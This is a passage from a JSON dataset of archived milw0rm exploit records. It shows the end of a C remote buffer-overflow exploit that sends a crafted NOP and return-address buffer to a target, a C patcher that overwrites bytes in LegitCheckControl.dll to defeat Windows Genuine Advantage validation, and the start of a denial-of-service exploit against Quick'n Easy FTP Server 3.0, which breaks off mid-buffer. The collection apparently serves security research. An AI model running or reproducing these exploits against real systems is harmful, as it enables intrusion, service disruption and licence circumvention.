NULL) {\n\n                printf(\"\\n[-] Resolve of %s failed.\", argv[1]);\n\n                exit(1);\n\n        }\n\n        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\n\n        sock.sin_family = AF_INET;\n\n        sock.sin_port = htons(iPort);\n\n\n\n        printf(\"\\n[+] Prepare exploit buffer... \");\n\n        memset(szExpBuff,NOP,BUFSIZE);\n\n        memcpy(szExpBuff,NULL_PING_COMMAND,sizeof(NULL_PING_COMMAND)-1);\n\n        memcpy(szExpBuff+576,RET_ADDR,sizeof(RET_ADDR)-1);\n\n\n\n        printf(\"\\n[+] Connecting to %s:%d ... \", argv[1],iPort);\n\n        if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) ))){\n\n                printf(\"\\n[-] Sorry, cannot connect to %s:%d. Try again...\", argv[1],iPort);\n\n                exit(1);\n\n        }\n\n\n\n        printf(\"\\n[+] OK.\");\n\n        if ( recv(s, szRecvBuf, BUFSIZE+1, 0) == 0 ) {\n\n                printf(\"\\n[-] Error response server. Exiting...\");\n\n                exit(1);\n\n        }\n\n\n\n        Sleep(1000);\n\n        printf(\"\\n[+] Sending exploit buffer. size: %d\",sizeof(szExpBuff));\n\n        if (send(s,szExpBuff, sizeof(szExpBuff)+1, 0) == -1){\n\n                printf(\"\\n[-] Send failed. Exiting...\");\n\n                exit(1);\n\n        }\n\n\n\n        Sleep(1000);\n\n        printf(\"\\n[+] OK.\\n\");\n\n        printf(\"\\n[*] Now try to connect to the server\");\n\n\n\n        closesocket(s);\n\n        WSACleanup();\n\n}\n\n\n\n// milw0rm.com [2005-08-01]",
680        "vulnerable": true
681    },
682    {
683        "exploit_id": 1128,
684        "content": "/*\n\n  Will be moved to tools section shortly /str0ke\n\n\n\n  Name: Windows Genuine Advantage Validation Patch\n\n  Copyright: NeoSecurityTeam\n\n  Author: HaCkZaTaN <hck_zatan@hotmail.com>\n\n  Date: 31/07/05 21:42\n\n  Description: LegitCheckControl.dll (1.3.254.0) \n\n  \n\n \u00da\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00bf\n\n \u00b3\u00fe\u00fe                   -==[N]eo [S]ecurity [T]eam Inc.==-                   \u00fe\u00fe\u00b3\n\n \u00c0\u00c4\u00c2\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c2\u00c4\u00d9\n\n \u00b3\u00b0\u00b3     TiTLE : Windows Genuine Advantage Validation                       \u00b3\u00b0\u00b3  \u00b3\u00b0\u00c3\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00b4\u00b0\u00b3\n\n \u00b3\u00b0\u00b3    AUTHOR : HaCkZaTaN                                                  \u00b3\u00b0\u00b3  \u00da\u00c4\u00c1\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c1\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c1\u00c4\u00bf\n\n \u00b3\u00fe\u00fe                           -==Information==-                            \u00fe\u00fe\u00b3  \u00c0\u00c4\u00c2\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c2\u00c4\u00d9\n\n \u00b3\u00b0\u00b3                                                                        \u00b3\u00b0\u00b3  \u00b3\u00b0\u00b3 LegitCheckControl.dll (1.3.254.0)                                      \u00b3\u00b0\u00b3  \u00b3\u00b0\u00b3                                                                        \u00b3\u00b0\u00b3\n\n \u00da\u00c4\u00c1\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c1\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c1\u00c4\u00bf\n\n \u00b3\u00fe\u00fe                           -==Contact==-                                \u00fe\u00fe\u00b3\n\n \u00c0\u00c4\u00c2\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c2\u00c4\u00d9\n\n \u00b3\u00b0\u00b3                                                                        \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3   [N]eo [S]ecurity [T]eam [NST]\u00ae - http://www.neosecurityteam.net/     \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3   HaCkZaTaN <hck_zatan@hotmail.com>                                    \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3   Irc.GigaChat.Net #uruguay                                            \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                                                                        \u00b3\u00b0\u00b3\n\n \u00da\u00c4\u00c1\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c1\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c1\u00c4\u00bf\n\n \u00b3\u00fe\u00fe                              -==Greets==-                              \u00fe\u00fe\u00b3\n\n \u00c0\u00c4\u00c2\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c2\u00c4\u00d9\n\n \u00b3\u00b0\u00b3                                                                        \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            NST's Staff                                 \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            erg0t                                       \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            ][GB][                                      \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            Beford                                      \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            LINUX                                       \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            Heap                                        \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            CrashCool                                   \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            Makoki                                      \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                            And my Colombian people                     \u00b3\u00b0\u00b3\n\n \u00b3\u00b0\u00b3                                                                        \u00b3\u00b0\u00b3  \u00da\u00c4\u00c1\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c1\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c1\u00c4\u00bf\n\n \u00b3\u00fe\u00fe                   -==[N]eo [S]ecurity [T]eam Inc.==-                   \u00fe\u00fe\u00b3\n\n \u00c0\u00c4\u00c2\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c4\u00c2\u00c4\u00d9\n\n                          \u00db\u00db\u00db\u00db   \u00db\u00db\u00db\u00db \u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db \u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\n\n                           \u00db\u00db\u00db\u00db\u00db  \u00db\u00db  \u00db\u00db\u00db       \u00db\u00db  \u00db\u00db\u00db  \u00db\u00db\n\n                           \u00db\u00db \u00db\u00db\u00db\u00db\u00db\u00db  \u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db     \u00db\u00db\u00db\n\n                           \u00db\u00db   \u00db\u00db\u00db\u00db        \u00db\u00db\u00db     \u00db\u00db\u00db\n\n                          \u00db\u00db\u00db\u00db    \u00db\u00db\u00db \u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db    \u00db\u00db\u00db\u00db\u00db\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n\n\ntypedef struct bytepair BYTEPAIR;\n\n\n\nstruct bytepair\n\n{\n\n       long offset;\n\n       char val;\n\n}; \n\n\n\nstatic const BYTEPAIR byte_pairs[3]= { \n\n{0x2BE98, 0x33},\n\n{0x2BE99, 0xC0},\n\n{0x2BE9A, 0x90},\n\n};\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n    FILE *LegitCheckControl;\n\n    int i;\n\n\n\n    printf(\"\\n\\t\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00dc\\n\"\n\n           \"\\t\u00b1\u00db\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db                                                         \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db           [N]eo [S]ecurity [T]eam [N][S][T]             \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db      [Windows Genuine Advantage Validation Patch]       \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db             LegitCheckControl.dll (1.3.254.0)           \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db                                                         \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db\u00db\u00db\u00db\u00db   \u00db\u00db\u00db\u00db\u00db\u00db\u00db   \u00db\u00db\u00db\u00db   \u00db\u00db \u00db\u00db \u00db\u00db\u00db\u00db  \u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db  \u00db\u00db\u00db\u00db  \u00db\u00db  \u00db\u00db   \u00db\u00db\u00db   \u00db\u00db \u00db\u00db\u00db  \u00db\u00db\u00db  \u00db\u00db\u00db \u00db\u00db \u00db\u00db \u00db\u00db \u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db  \u00db \u00db\u00db\u00db \u00db\u00db  \u00db\u00db   \u00db\u00db\u00db   \u00db\u00db      \u00db\u00db\u00db  \u00db\u00db\u00db    \u00db\u00db    \u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db  \u00db \u00db\u00db\u00db \u00db\u00db  \u00db\u00db   \u00db\u00db\u00db   \u00db\u00db\u00db\u00db    \u00db\u00db\u00db  \u00db\u00db\u00db    \u00db\u00db    \u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db  \u00db   \u00db\u00db\u00db\u00db  \u00db\u00db   \u00db\u00db\u00db    \u00db\u00db\u00db\u00db\u00db  \u00db\u00db\u00db  \u00db\u00db\u00db    \u00db\u00db    \u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db  \u00db    \u00db\u00db\u00db  \u00db\u00db   \u00db\u00db\u00db      \u00db\u00db\u00db  \u00db\u00db\u00db  \u00db\u00db\u00db    \u00db\u00db    \u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db  \u00db    \u00db\u00db\u00db  \u00db\u00db   \u00db\u00db\u00db   \u00db\u00db \u00db\u00db\u00db  \u00db\u00db\u00db  \u00db\u00db\u00db    \u00db\u00db    \u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db \u00db\u00db\u00db    \u00db\u00db  \u00db\u00db   \u00db\u00db\u00db   \u00db \u00db\u00db    \u00db\u00db\u00db  \u00db\u00db\u00db   \u00db\u00db\u00db\u00db   \u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db            \u00db\u00db   \u00db\u00db\u00db           \u00db\u00db\u00db  \u00db\u00db\u00db          \u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db \u00db\u00db\u00db\u00db          \u00db\u00db\u00db   \u00db\u00db\u00db\u00db         \u00db\u00db\u00db\u00db  \u00db\u00db\u00db\u00db        \u00db\u00db\u00db\u00db \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db                                                         \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db                 [ HaCkZaTaN  ..... ]                    \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db                 [ Paisterist ..... ]                    \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db                 [ Daemon21   ..... ]                    \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db                 [ g30rg3_x   ..... ]                    \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db            [ Http://WwW.NeoSecurityTeam.Net ]           \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00db                                                         \u00b1\u00db\\n\"\n\n           \"\\t\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00b1\u00db\\n\"\n\n           \"\\t \u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\u00df\\n\\n\\n\");\n\n           \n\n           getchar();\n\n           LegitCheckControl = fopen(\"LegitCheckControl.dll\", \"r+\");\n\n           \n\n           if (LegitCheckControl == (FILE *)0)\n\n           {\n\n                       printf(\"LegitCheckControl.dll not found. Aborting.\\n\\n\");\n\n                       printf(\"Hit <Enter> to quit.\");\n\n                       getchar();\n\n                       return 1;\n\n           }\n\n           \n\n           printf(\"Starting...\\n\");\n\n           \n\n           for (i = 0; i < 3; i++)\n\n           {\n\n               fseek(LegitCheckControl, byte_pairs[i].offset, SEEK_SET);\n\n               fwrite(&byte_pairs[i].val, 1, 1, LegitCheckControl);\n\n           }\n\n           \n\n           fclose(LegitCheckControl);\n\n           printf(\"->Patch completed.\\n\\n\");\n\n           printf(\"Done, enjoy...\\n\\n\");\n\n           getchar();\n\n\n\n           return 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-01]",
685        "vulnerable": true
686    },
687    {
688        "exploit_id": 1129,
689        "content": "/*****************************************************************\n\n\n\nQuick'n Easy FTP Server 3.0 (pro and lite) Remote D.o.S Exploit by Kozan\n\n( Based on matiteman's code in perl )\n\n\n\nApplication: Quick 'n Easy FTP Server 3.0 (pro and lite)\n\nVendor: www.pablosoftwaresolutions.com\n\n\n\nDiscovered by: matiteman\n\nExploit Coded by: Kozan\n\nCredits to ATmaCA, matiteman\n\nWeb: www.spyinstructors.com\n\nMail: kozan@spyinstructors.com\n\n\n\n*****************************************************************/\n\n\n\n#include <winsock2.h>\n\n#include <windows.h>\n\n#include <stdio.h>\n\n\n\n\n\n#pragma comment(lib,\"ws2_32.lib\")\n\n\n\nchar Buff[] =\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\